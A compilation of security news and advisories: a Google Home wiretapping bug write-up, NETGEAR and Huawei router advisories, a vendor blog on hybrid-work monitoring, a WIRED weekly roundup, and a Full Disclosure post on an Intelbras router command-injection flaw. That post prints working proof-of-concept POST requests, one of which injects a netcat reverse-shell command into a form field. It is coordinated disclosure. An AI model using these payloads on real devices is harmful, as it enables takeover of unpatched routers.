A security researcher was awarded a bug bounty of $107,500 for identifying security issues in Google Home smart speakers that could be exploited to install backdoors and turn them into wiretapping devices.
The flaws "allowed an attacker within wireless proximity to install a 'backdoor' account on the device, enabling them to send commands to it remotely over the internet, access its microphone

A security researcher was awarded a bug bounty of $107,500 for identifying security issues in Google Home smart speakers that could be exploited to install backdoors and turn them into wiretapping devices.

The flaws "allowed an attacker within wireless proximity to install a 'backdoor' account on the device, enabling them to send commands to it remotely over the internet, access its microphone feed, and make arbitrary HTTP requests within the victim's LAN," the researcher, who goes by the name Matt, disclosed in a technical write-up published this week.

In making such malicious requests, not only could the Wi-Fi password get exposed, but also provide the adversary direct access to other devices connected to the same network. Following responsible disclosure on January 8, 2021, the issues were remediated by Google in April 2021.

The problem, in a nutshell, has to do with how the Google Home software architecture can be leveraged to add a rogue Google user account to a target's home automation device.

In an attack chain detailed by the researcher, a threat actor looking to eavesdrop on a victim can trick the individual into installing a malicious Android app, which, upon detecting a Google Home device on the network, issues stealthy HTTP requests to link an attacker's account to the victim's device.

Taking things a notch higher, it also emerged that, by staging a Wi-Fi deauthentication attack to force a Google Home device to disconnect from the network, the appliance can be made to enter a "setup mode" and create its own open Wi-Fi network.

The threat actor can subsequently connect to the device's setup network and request details like device name, cloud\_device\_id, and certificate, and use them to link their account to the device.

Regardless of the attack sequence employed, a successful link process enables the adversary to take advantage of Google Home routines to turn down the volume to zero and call a specific phone number at any given point in time to spy on the victim through the device's microphone.

"The only thing the victim may notice is that the device's LEDs turn solid blue, but they'd probably just assume it's updating the firmware or something," Matt said. "During a call, the LEDs do not pulse like they normally do when the device is listening, so there is no indication that the microphone is open."

Furthermore, the attack can be extended to make arbitrary HTTP requests within the victim's network and even read files or introduce malicious modifications on the linked device that would get applied after a reboot.

This is not the first time such attack methods have been devised to covertly snoop on potential targets through voice-activated devices.

In November 2019, a group of academics disclosed a technique called Light Commands, which refers to a vulnerability of MEMS microphones that permits attackers to remotely inject inaudible and invisible commands into popular voice assistants like Google Assistant, Amazon Alexa, Facebook Portal, and Apple Siri using light.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researcher Uncovers Potential Wiretapping Bugs in Google Home Smart Speakers

Certain NETGEAR devices are affected by a buffer overflow by an unauthenticated attacker. This affects RAX40 before 1.0.2.60, RAX35 before 1.0.2.60, R6400v2 before 1.0.4.122, R6700v3 before 1.0.4.122, R6900P before 1.3.3.152, R7000P before 1.3.3.152, R7000 before 1.0.11.136, R7960P before 1.4.4.94, and R8000P before 1.4.4.94.

Was this article helpful?   Yes     No | 5 people found this helpful in last 30 days

Associated CVE IDs: None

First published: 12/28/2022

NETGEAR has released fixes for a pre-authentication buffer overflow security vulnerability on the following product models:

*   RAX40 fixed in firmware version 1.0.2.60
*   RAX35 fixed in firmware version 1.0.2.60
*   R6400v2 fixed in firmware version 1.0.4.122
*   R6700v3 fixed in firmware version 1.0.4.122
*   R6900P fixed in firmware version 1.3.3.152
*   R7000P fixed in firmware version 1.3.3.152
*   R7000 fixed in firmware version 1.0.11.136
*   R7960P fixed in firmware version 1.4.4.94
*   R8000P fixed in firmware version 1.4.4.94

NETGEAR strongly recommends that you download the latest firmware as soon as possible.

**To download the latest firmware for your NETGEAR product:**

1.  Visit NETGEAR Support.
2.  Start typing your model number in the search box, then select your model from the drop-down menu as soon as it appears.  
    If you do not see a drop-down menu, make sure that you entered your model number correctly, or select a product category to browse for your product model.
3.  Click **Downloads**.
4.  Under **Current Versions**, select the download whose title begins with **Firmware Version**.
5.  Click **Download**.
6.  Follow the instructions in your product’s user manual, firmware release notes, or product support page to install the new firmware.

****Disclaimer****

This document is provided on an "as is" basis and does not imply any kind of guarantee or warranty, including the warranties of merchantability or fitness for a particular use. Your use of the information in the document or materials linked from the document is at your own risk. NETGEAR reserves the right to change or update this document at any time. NETGEAR expects to update this document as new information becomes available.

The pre-authentication buffer overflow vulnerability remains if you do not complete all recommended steps. NETGEAR is not responsible for any consequences that could have been avoided by following the recommendations in this notification.

****Acknowledgements****

fr33rh

****Common Vulnerability Scoring System****

CVSS Rating: High

CVSS Score: 7.4

CVSS Vector: CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

****Best Practices for Updating Firmware****

We recommend that you keep your NETGEAR devices up to date with the latest firmware. Firmware updates contain security fixes, bug fixes, and new features for your NETGEAR products.

If your product is supported by one of our apps, using the app is the easiest way to update your firmware:

*   Orbi products: NETGEAR Orbi app
*   NETGEAR WiFi routers: NETGEAR Nighthawk app
*   Some NETGEAR Business products: NETGEAR Insight app (firmware updates through the app are available only for Insight subscribers)

If your product is not supported by one of our apps, you can always update your firmware manually by following the instructions in your product’s user manual, firmware release notes, or product support page. For more information, see Where can I find information about my NETGEAR product?.

****Contact****

We appreciate and value having security concerns brought to our attention. NETGEAR constantly monitors for both known and unknown threats. Being pro-active rather than re-active to emerging security issues is fundamental for product support at NETGEAR.

It is NETGEAR's mission to be the innovative leader in connecting the world to the internet. To achieve this mission, we strive to earn and maintain the trust of those that use NETGEAR products for their connectivity.

To report a security vulnerability, visit http://www.netgear.com/about/security/. 

If you are a NETGEAR customer with a security-related support concern, you can contact NETGEAR customer support at techsupport.security@netgear.com. 

****Revision History****

12/28/2022: Published advisory

Last Updated:12/29/2022 | Article ID: 000065495

**Was this article helpful?**Yes No

**This article applies to:**

*   Wireless AC Router Nighthawk (6)
    *   R6700v3
    *   R6900P
    *   R7000
    *   R7000P
    *   R7960P
    *   R8000P
*   Wireless AX Router Nighthawk (WiFi 6) (2)
    *   RAX35
    *   RAX40
*   Wireless AC Router (1)
    *   R6400v2

How to Find Your Model Number

**Looking for more about your product?**

Get information, documentation, videos and more for your specific product.

**Need to Contact NETGEAR Support?**

With NETGEAR’s round-the-clock premium support, help is just a phone call away.

**Complimentary Support**

NETGEAR provides complimentary technical support for NETGEAR products for 90 days from the original date of purchase.

Contact Support

**NETGEAR Premium Support**

**GearHead Support for Home Users**

GearHead Support is a technical support service for NETGEAR devices and all other connected devices in your home. Advanced remote support tools are used to fix issues on any of your devices. The service includes support for the following:

*   Desktop and Notebook PCs, Wired and Wireless Routers, Modems, Printers, Scanners, Fax Machines, USB devices and Sound Cards
*   Windows Operating Systems (2000, XP or Vista), MS Word, Excel, PowerPoint, Outlook and Adobe Acrobat
*   Anti-virus and Anti-Spyware: McAfee, Norton, AVG, eTrust and BitDefender

Learn More

**ProSUPPORT Services for Business Users**

NETGEAR ProSUPPORT services are available to supplement your technical support and warranty entitlements. NETGEAR offers a variety of ProSUPPORT services that allow you to access NETGEAR's expertise in a way that best meets your needs:

*   Product Installation
*   Professional Wireless Site Survey
*   Defective Drive Retention (DDR) Service

Learn More

CVE-2022-48196: Security Advisory for Pre-Authentication Buffer Overflow on Some Routers, PSV-2019-0208

There is a denial of service vulnerability in the Wi-Fi module of the HUAWEI WS7100-20 Smart WiFi Router.Successful exploit could cause a denial of service (DoS) condition.

There is a denial of service vulnerability in the Wi-Fi module of the HUAWEI WS7100-20 Smart WiFi Router.Successful exploit could cause a denial of service (DoS) condition. (Vulnerability ID:HWPSIRT-2022-59488)

This vulnerability has been assigned a (CVE) ID: CVE-2022-46740

Affected Product

Affected Version

Resolved Version

WS7100-20

WS7100-20 10.0.5.33

WS7100-20 11.0.5.5

Successful exploit could cause a denial of service (DoS) condition.

HWPSIRT-2022-59488:

Base score:4.3

Temporary score:4.0

Environmental Score:NA

CVSS v3.1 Vector: AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L/E:F/RL:O/RC:C

HWPSIRT-2022-59488:

This vulnerability can be exploited only when the following conditions are present:

An attacker could send a crafted message to the device.

Technical details:

There is a denial of service vulnerability in the Wi-Fi module of the HUAWEI WS7100-20 Smart WiFi Router. Due to incorrect verification of external messages, An attacker can exploit this vulnerability by sending crafted packets to the device.Successful exploitation of this vulnerability may cause a denial of service vulnerability on the WS7100-20.

The product that supports automatic update will receive a system update prompt. You can install the update to fix the vulnerability.

The vulnerability was discovered by external researchers Vyron Kampourakis and Efstratios Chatzoglou.

2022-12-09 V1.1 Updated "Source";  
2022-12-08 V1.0 Initial Release;

Huawei adheres to protecting the ultimate interests of users with best efforts and the principle of responsible disclosure and deal with product security issues through our response mechanism.

To enjoy Huawei PSIRT services and obtain Huawei product vulnerability information, please visit http://www.huawei.com/en/psirt.

To report a security vulnerability in Huawei products and solutions, please send it to PSIRT@huawei.com. For details, please visit http://www.huawei.com/en/psirt/report-vulnerabilities.

This document is provided on an "AS IS" basis and does not imply any kind of guarantee or warranty, either express or implied, including the warranties of merchantability or fitness for a particular purpose. In no event shall Huawei or any of its directly or indirectly controlled subsidiaries or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. Your use of the document, by whatsoever means, will be totally at your own risk. Huawei is entitled to amend or update this document from time to time.

CVE-2022-46740: huawei-sa-DoSViHSWR-8f632df1-en

Digital transformation initiatives are challenging because IT still has to make sure performance doesn't suffer by making applications available from anywhere.

Over the past two years, many businesses have adopted hybrid work environments and begun migrating mission-critical applications to the cloud to allow their hybrid workforce to work from anywhere. However, combining working from anywhere with migrating applications such as Salesforce, SAP, Microsoft 365, and ServiceNow was an IT challenge because the networks needed to be improved.

The challenge was to reduce downtime and increase end user productivity. Even minor outages can impact operations, productivity, and profits, with Gartner suggesting that unplanned downtime costs US$5,600 per minute. To reduce such costs, businesses must quickly identify the root cause of outages and turn to intelligent digital experience monitoring solutions.

    

45 minutes of downtime costs more than a quarter million dollars. (Source: Gartner)

Businesses spent time rethinking the digital transformation journey to ensure they were delivering excellent performance while still securing users, workloads, and device communications over any network. As businesses look forward to 2023, three top digital experience monitoring trends emerge:

**Increase Hybrid Workforce Productivity**

Many businesses have accelerated digital business initiatives over the past couple of years to retain talent and optimize productivity. Companies like Zoom, Facebook, Google, and Apple adjusted their work-from-home policies to allow 100% remote and hybrid formats. Even healthcare businesses have enabled staff to work remotely, offering more telemedicine options and limiting in-person appointments.

Remote work is here to stay for the foreseeable future, as employees have proven that this hybrid model is possible. However, IT teams need to focus on keeping the business operational while ensuring excellent end user productivity. Supporting hybrid workers means having fast and reliable insights as issues arise from various devices, applications, and networks being used. For example, help desk and network operations teams need to know whether the user is having an issue with the local Wi-Fi connection or if there are problems with any of the network hops between the user's machine and where the application is hosted.

As hybrid workers become more adept at working from home, they learn basic connectivity troubleshooting steps, such as rebooting the home Wi-Fi router. In 2023, businesses need to be able to quickly recommend ways to solve end user problems without requiring users to open support tickets. IT teams need a global view of their environment to pinpoint areas of focus, and then to actively look at specific users to understand their challenges. This will reduce IT troubleshooting time while increasing end user productivity.

**Faster Mean Time to Resolution (MTTR) With Smart Technologies**

Service desk and network operations teams must look past traditional castle-and-moat architecture, change their work-from-home policies, and provide users with fast and reliable access from anywhere. To increase productivity, IT teams must diagnose an end user's situation quickly and confidently. They must analyze each device, dedicated network path, and application response times. That's the only way to grasp the end user's dilemma fully. To effectively analyze data from these segments and provide a meaningful response, IT teams will benefit from the help of AI and machine learning (ML).

In 2023, we’ll see continued growth in AI/ML-based technologies as they ingest more data and learn to apply insights across the board. The key will be the amount of data being ingested and analyzed. The intelligence will come from solutions that combine multiple facets of end user experience. For example, providing secure, fast, and reliable connections with the ability to triage issues based on collected data will separate solutions that offer combined capabilities from ordinary point products.

The FIFA World Cup used AI to produce some compelling projections . Imagine if the players knew exactly where to position the ball for a goal—it would be game-changing! Similarly, if service desk and network operations teams could similarly leverage AI, they would be able to quickly triage end user issues In 2023, let's spend less time with traditional operations troubleshooting guides and more with AI-based solutions.

As IT teams look to better understand their environments, they’ll need intelligent systems to provide trends and patterns holistically. In 2023, AI-based solutions should evolve to find trends and systematic issues. For example, imagine a view into your network that classified which ISPs were the most troublesome globally. You could create a plan to move off those ISPs or position them as backups, for instance. You could also use this knowledge to negotiate better terms with the ISP. Armed with AI-based insights, IT teams would have opportunities to optimize their environments and reduce potential outage scenarios.

**Reduce IT Costs With Monitoring Plus Security Solutions**

Macroeconomics will focus on reducing overall costs and increasing flexibility (consolidation). In 2023, businesses will not only look to remove siloed monitoring solutions around devices, networks, and applications; they will also look for solutions that combine monitoring and security. These two services fit together nicely.

With security issues on the rise, IT teams will continue to face pressure from executives on what happened, end user impact, and prevention techniques. The challenge will be trying to reduce costs while gaining this intelligence. Cloud-based solutions make it easier for IT teams to get started small, get comfortable with the solution, and then scale.

For example, when the economy shifts, more businesses look to consolidate through mergers and acquisitions. However, these business initiatives aren’t always predictable, and IT must ensure solutions are in place that can easily handle these shifts. With secure cloud-based solutions, IT teams can quickly focus on security and monitoring, and then scale while controlling costs .

One more way to reduce costs in 2023 will be to focus on using existing IT service management tools. For example, many businesses use ServiceNow—wouldn't it be great if digital experience monitoring could easily integrate into these solutions? IT teams could more easily adopt new digital experience monitoring solutions without changing their entire workflow. Continuing to reduce costs is all about intelligently gaining insights with smarter integrations.

Read more _Partner Perspectives_ from Zscaler.

Securing and Improving User Experience for the Future of Hybrid Work

Intelbras WiFiber 120AC inMesh before 1-1-220826 allows command injection by authenticated users, as demonstrated by the /boaform/formPing6 and /boaform/formTracert URIs for ping and traceroute.

**Full Disclosure mailing list archives****Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh**

_From_: Thomas Weber <t.weber () cyberdanube com>  
_Date_: Tue, 13 Dec 2022 17:59:41 +0100  

CyberDanube Security Research 20221009-0

\-------------------------------------------------------------------------------

               title| Authenticated Command Injection
             product| Intelbras WiFiber 120AC inMesh
  vulnerable version| 1.1-220216
       fixed version| 1-1-220826
          CVE number| CVE-2022-40005
              impact| High
            homepage| https://www.intelbras.com
               found| 2022-08-01
                  by| T. Weber (Office Vienna)
                    | CyberDanube Security Research
                    | Vienna | St. Pölten
                    |
                    | https://www.cyberdanube.com

\-------------------------------------------------------------------------------

Vendor description

\-------------------------------------------------------------------------------

"We are Intelbras. A company that for 45 years has been offering innovative

solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an

INspiration and a promising idea: to manufacture PABX centrals. During the

80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s

were marked by the consolidation of the company in the telecommunications

segment and we became leaders in the PABX and telephone terminals segment. The

turn of the millennium represented the search for greater connection and

proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing

units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.

We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our

DNA, increasingly present in our daily lives. And it was only possible to

write a story so full of achievements because employees, partners and customers

were close and believed in us."

Source: https://www.intelbras.com/en/institutional/who-we-are

Vulnerable versions

\-------------------------------------------------------------------------------

WiFiber 120AC inMesh / 1.1-220216


Vulnerability overview

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)

The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can

be done by an attacker.


Proof of Concept

\-------------------------------------------------------------------------------

1) Authenticated Command Injection (CVE-2022-40005)
The web server is prone to an authenticated command injection via POST
parameters. The following proof-of-concept shows how to inject the command
"ls /" to the system which gets executed in the background:

\===============================================================================

POST /boaform/formPing6 HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/ping6.asp
Upgrade-Insecure-Requests: 1

pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================

The following commands can be used to open a reverse shell:

"rm -f /tmp/f"
"mkfifo /tmp/f"
"cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"

Those commands were sent via a crafted POST request:

\===============================================================================

POST /boaform/formTracert HTTP/1.1
Host: 192.168.3.147

User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 255
Origin: http://192.168.3.147
Connection: close
Referer: http://192.168.3.147/tracert.asp
Upgrade-Insecure-Requests: 1

proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================

The vulnerability was manually verified on an emulated device by using the
MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).


Solution

\-------------------------------------------------------------------------------

Update to firmware version 1-1-220826.

https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip

Workaround

\-------------------------------------------------------------------------------

None


Recommendation

\-------------------------------------------------------------------------------

CyberDanube recommends Intelbras customers to upgrade the firmware to the
latest version available.


Contact Timeline

\-------------------------------------------------------------------------------

2022-08-02: Contacting Intelbras via suporte () intelbras com br.
2022-08-03: Request from Intelbras to send the advisory to
csirt () intelbras com br; Sent the advisory to this address.
2022-08-30: Asked for status update; Vendor answered that the new firmware

            version has been released the day before. Set the disclosure date

            to 2022-10-03 (60 days policy).
2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
2022-10-09: Coordinated disclosure of advisory.


Web: https://www.cyberdanube.com
Twitter: https://twitter.com/cyberdanube
Mail: research at cyberdanube dot com

EOF T. Weber / @2022

On 09.10.22 17:21, Thomas Weber wrote:

> CyberDanube Security Research 20221009-0
> 
> \-------------------------------------------------------------------------------
> 
>                title| Authenticated Command Injection
>              product| Intelbras WiFiber 120AC inMesh
>   vulnerable version| 1.1-220216
>        fixed version| 1-1-220826
>           CVE number|
>               impact| High
>             homepage| https://www.intelbras.com
>                found| 2022-08-01
>                   by| T. Weber (Office Vienna)
>                     | CyberDanube Security Research
>                     | Vienna | St. Pölten
>                     |
>                     | https://www.cyberdanube.com
> 
> \-------------------------------------------------------------------------------
> 
> Vendor description
> 
> \------------------------------------------------------------------------------- "We are Intelbras. A company that for 45 years has been offering innovative solutions in security, networks, communication and energy. Our dream began to come to life there in 1976, in the city of São José, having originated from an INspiration and a promising idea: to manufacture PABX centrals. During the 80's, we surprised the market with the launch of the first PABX developed with national technology, a product that showed everyone our innovative DNA. The 90s
> 
> were marked by the consolidation of the company in the telecommunications
> 
> segment and we became leaders in the PABX and telephone terminals segment. The
> 
> turn of the millennium represented the search for greater connection and
> 
> proximity to people, something that is in total harmony with our philosophy to this day. More consolidated in the market, in 2010 we opened 3 manufacturing
> 
> units, located in Santa Rita do Sapucaí/MG, Manaus/AM and São José/SC.
> 
> We reached our 45th birthday having reached a historic milestone: we have been a company listed on the B3 since February 2021. Our trajectory so far has been INnovative, INtelligent and INSpiring. We saw innovation, which is part of our
> 
> DNA, increasingly present in our daily lives. And it was only possible to
> 
> write a story so full of achievements because employees, partners and customers
> 
> were close and believed in us."
> 
> Source: https://www.intelbras.com/en/institutional/who-we-are
> 
> Vulnerable versions
> 
> \-------------------------------------------------------------------------------
> 
> WiFiber 120AC inMesh / 1.1-220216
> 
> 
> Vulnerability overview
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> 
> The web server of the device is prone to an authenticated command injection. It allows an attacker to gain full access to the underlying operating system of the device with all implications. If such a device is acting as key device in an industrial network, more extensive damage in the corresponding network can
> 
> be done by an attacker.
> 
> 
> Proof of Concept
> 
> \-------------------------------------------------------------------------------
> 
> 1) Authenticated Command Injection
> The web server is prone to an authenticated command injection via POST
> 
> parameters. The following proof-of-concept shows how to inject the command
> 
> "ls /" to the system which gets executed in the background:
> 
> \===============================================================================
> 
> POST /boaform/formPing6 HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 87
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/ping6.asp
> Upgrade-Insecure-Requests: 1
> 
> pingAddr=%3Bls+%2F%3B&wanif=65535&go=+Ir&submit-url=%2Fping6.asp&postSecurityFlag=39908 \===============================================================================
> 
> The following commands can be used to open a reverse shell:
> 
> "rm -f /tmp/f"
> "mkfifo /tmp/f"
> "cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.3.138 8889 >/tmp/f"
> 
> Those commands were sent via a crafted POST request:
> 
> \===============================================================================
> 
> POST /boaform/formTracert HTTP/1.1
> Host: 192.168.3.147
> 
> User-Agent: Mozilla/5.0 (X11; Linux x86\_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,\*/\*;q=0.8
> 
> Accept-Language: de,en-US;q=0.7,en;q=0.3
> Accept-Encoding: gzip, deflate
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 255
> Origin: http://192.168.3.147
> Connection: close
> Referer: http://192.168.3.147/tracert.asp
> Upgrade-Insecure-Requests: 1
> 
> proto=0&traceAddr=%3Brm+-f+%2Ftmp%2Ff%3Bmkfifo+%2Ftmp%2Ff%3Bcat+%2Ftmp%2Ff%7C%2Fbin%2Fsh+-i+2%3E%261%7Cnc+192.168.3.138+8889+%3E%2Ftmp%2Ff%3B&trys=3&timeout=5&datasize=56&dscp=0&maxhop=30&wanif=65535&go=+Ir&submit-url=%2Ftracert.asp&postSecurityFlag=29290 \===============================================================================
> 
> The vulnerability was manually verified on an emulated device by using the
> 
> MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
> 
> 
> Solution
> 
> \-------------------------------------------------------------------------------
> 
> Update to firmware version 1-1-220826.
> 
> https://backend.intelbras.com/sites/default/files/2022-08/ONT\_Wifiber\_120\_AC\_Vers%C3%A3o\_1-1-220826.zip
> 
> Workaround
> 
> \-------------------------------------------------------------------------------
> 
> None
> 
> 
> Recommendation
> 
> \-------------------------------------------------------------------------------
> 
> CyberDanube recommends Intelbras customers to upgrade the firmware to the
> latest version available.
> 
> 
> Contact Timeline
> 
> \-------------------------------------------------------------------------------
> 
> 2022-08-02: Contacting Intelbras via suporte () intelbras com br.
> 2022-08-03: Request from Intelbras to send the advisory to
> csirt () intelbras com br; Sent the advisory to this address.
> 
> 2022-08-30: Asked for status update; Vendor answered that the new firmware             version has been released the day before. Set the disclosure date
> 
>             to 2022-10-03 (60 days policy).
> 2022-10-03: Shifted disclosure date to 2022-10-09 due to sick colleagues.
> 2022-10-09: Coordinated disclosure of advisory.
> 
> 
> Web: https://www.cyberdanube.com
> Twitter: https://twitter.com/cyberdanube
> Mail: research at cyberdanube dot com
> 
> EOF T. Weber / @2022

**Attachment: smime.p7s**  
_Description:_ S/MIME Cryptographic Signature

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

**Current thread:**

*   **Re: CyberDanube Security Research 20221009-0 | Authenticated Command Injection in Intelbras WiFiber 120AC inMesh** _Thomas Weber (Dec 13)_

CVE-2022-40005: Full Disclosure: Re: CyberDanube Security Research 20221009-0

Plus: An offensive US hacking operation, swatters hacking Ring cameras, a Netflix password-sharing crackdown, and more.

We at WIRED are winding down for the year and gearing up for what is sure to be an eventful 2023. But 2022 isn’t going down without a fight. 

This week, following a new surge in mayhem at Twitter, we dove into exactly why the public needs real-time flight tracking, even if Elon Musk claims it’s the equivalent of doxing. The crucial transparency this publicly available data provides far outweighs the limited privacy value that censoring would give to the world’s rich and powerful. Unfortunately, Musk’s threats of legal action against the developer of the @ElonJet tracker are having broader chilling effects. 

Meanwhile, Iran’s internet blackouts—a response to widespread civil rights protests—are sabotaging the country’s economy, according to a new assessment from the US Department of State. Due to heavy sanctions on Iranian entities, the exact economic impact of Tehran’s internet blackouts is difficult to calculate. But experts agree it’s not good. 

You may have encountered the Flipper Zero in a recent viral TikTok video—but don’t believe everything you see. WIRED’s Dhruv Mehrotra got his hands on the palm-size device, which packs an array of antennas that allow you to copy and broadcast signals from all types of devices, like RFID chips, NFC cards, and more. We found that while the Flipper Zero can’t, say, make an ATM spill out money, it allows you to do plenty of other things that could get you into trouble. But mostly, it allows you to see the radio-wave-filled world around you like never before.

But that’s not all. Each week, we round up the security stories we didn’t cover in-depth ourselves. Click on the headlines to read the full stories. And stay safe out there. 

Between long hours, medallion costs, and the rise of Uber and Lyft, the life of a New York City cab driver is hard enough. Now it seems that Russian hackers—and a couple of their enterprising partners in Queens—were trying to get their own cut of those drivers’ fares.

According to prosecutors, two Queens men, Daniel Abayev and Peter Leyman, worked with Russian hackers to gain access to the taxi dispatch system for New York’s JFK airport. They then allegedly created a group chat where drivers could secretly pay $10 to skip the sometimes hours-long line to be assigned a pickup—about a fifth of the $52 flat fee passengers pay for rides from the airport to elsewhere in NYC. The indictment against the two men doesn’t name the Russians or detail exactly how they gained access to JFK’s dispatch system. But it notes that since 2019, Abayev and Leyman allegedly schemed to get access to the system by multiple methods, including bribing someone to insert a USB drive with malware into one of the dispatch operators’ computers, gaining unauthorized access to their systems via Wi-Fi, and stealing one of their tablet computers. “I know that the Pentagon is being hacked,” Abayev wrote to his Russian contacts in November 2019, according to the indictment. “So, can’t we hack the taxi industry\[?\]” 

Before the scheme was shut down, prosecutors say it was enabling as many as a thousand fraudulent line-skips a day for drivers, 

It’s hardly a secret that Cyber Command, the more cyberattack-focused sister organization to the NSA, is frequently engaged in “hunting forward,” as Cybercom director Paul Nakasone has described it. That means hacking foreign hackers preemptively to disrupt their operations, often in advance of an event like a US election. So perhaps it’s no surprise, as _The Washington Post_ reports, that Cybercom targeted Russian and Iranian hackers throughout the 2022 midterm elections. It’s not clear exactly how those hackers were disrupted, but one official told the _Post_ that the operations typically go after the basic tools the hackers use to operate, including their computers, internet connections, and malware. In some cases, that foreign malware is discovered by Cybercom abroad and shared with potential targets in the US to make it more easily detected. 

While foreign hacking of US elections has waned since its peak in 2016—when Russia hacked the Democratic National Committee, Clinton campaign, and many other targets—it has by no means disappeared. Cybersecurity firm Mandiant reported this week that the Russian military intelligence agency the GRU appears to have targeted election websites with distributed denial-of-service attacks during the midterm elections, despite Cyber Command’s efforts.

On Monday, federal prosecutors charged two men—one from Wisconsin, the other from North Carolina—for allegedly participating in a swatting scheme that, over a one-week span, targeted the owners of more than a dozen compromised Ring home security door cameras.  According to the indictment, Kya Christian Nelson, 21, and James Thomas Andrew McCarty, 20, used login credentials from leaked Yahoo accounts to access Ring accounts from individuals around the country. The defendants then allegedly phoned in false reports to law enforcement claiming to dispatchers that a violent incident was taking place at the victim’s house, and then they livestreamed the police response to the hoax. In several of the incidents, the two men taunted responding police officers and victims through the microphone of the Ring device, according to the indictment.

Nelson, who went by the alias “ChumLul,” is currently incarcerated in Kentucky in an unrelated case. McCarty, who went by the alias “Aspertaine,” was arrested last week on federal charges filed in the District of Arizona. Nelson and McCarty are both charged with conspiring to intentionally access computers without authorization. Nelson has also been charged with two counts of intentionally accessing a computer without authorization and two counts of aggravated identity theft. If convicted, they could each face up to five years in prison, with Nelson facing an additional seven years for the additional charges.

In March 2017, Netflix tweeted a simple message: “Love is sharing a password.” Now, five years later, that sentiment is coming to the end of its life. According to a _Wall Street Journal_ report this week, the streaming service plans to clamp down on password sharing in early 2023. Netflix has been testing ways to stop households in Latin America from sharing passwords throughout 2022, and the report suggests it is ready to expand the measures. Netflix says more than 100 million viewers watch its TV shows and movies using other people’s passwords, and it wants to convert those views into cash. “Make no mistake, I don’t think consumers are going to love it right out of the gate,” the _Journal_ reports Netflix co-CEO Ted Sarandos telling investors earlier this year. Elsewhere, the UK government’s Intellectual Property Office said it believes sharing passwords for online streaming services could breach copyright laws. It is unlikely anyone would ever be prosecuted, though.

The Roomba J7 home robot uses “PrecisionVision Navigation” to avoid objects in your home—such as piles of clothes on the floor or accidental piles of dog crap. The robot is partly able to do this using a built-in camera and computer vision. However, as _MIT Technology Review_ reported this week, gig economy workers in Venezuela posted photos from the robots online—including one image of a woman on the toilet. The photos and videos were captured by a development version of the J7 robot in 2020 and shared with a startup that contracts workers to label the images, helping to train computer vision systems. Those using the development machines had agreed for their data to be shared. Roomba maker iRobot, which is being purchased by Amazon, said it is ending its contract with the startup that leaked the images and is investigating what happened. However, the incident highlights some of the potential privacy risks with the vast data sets that are used to train artificial intelligence applications.

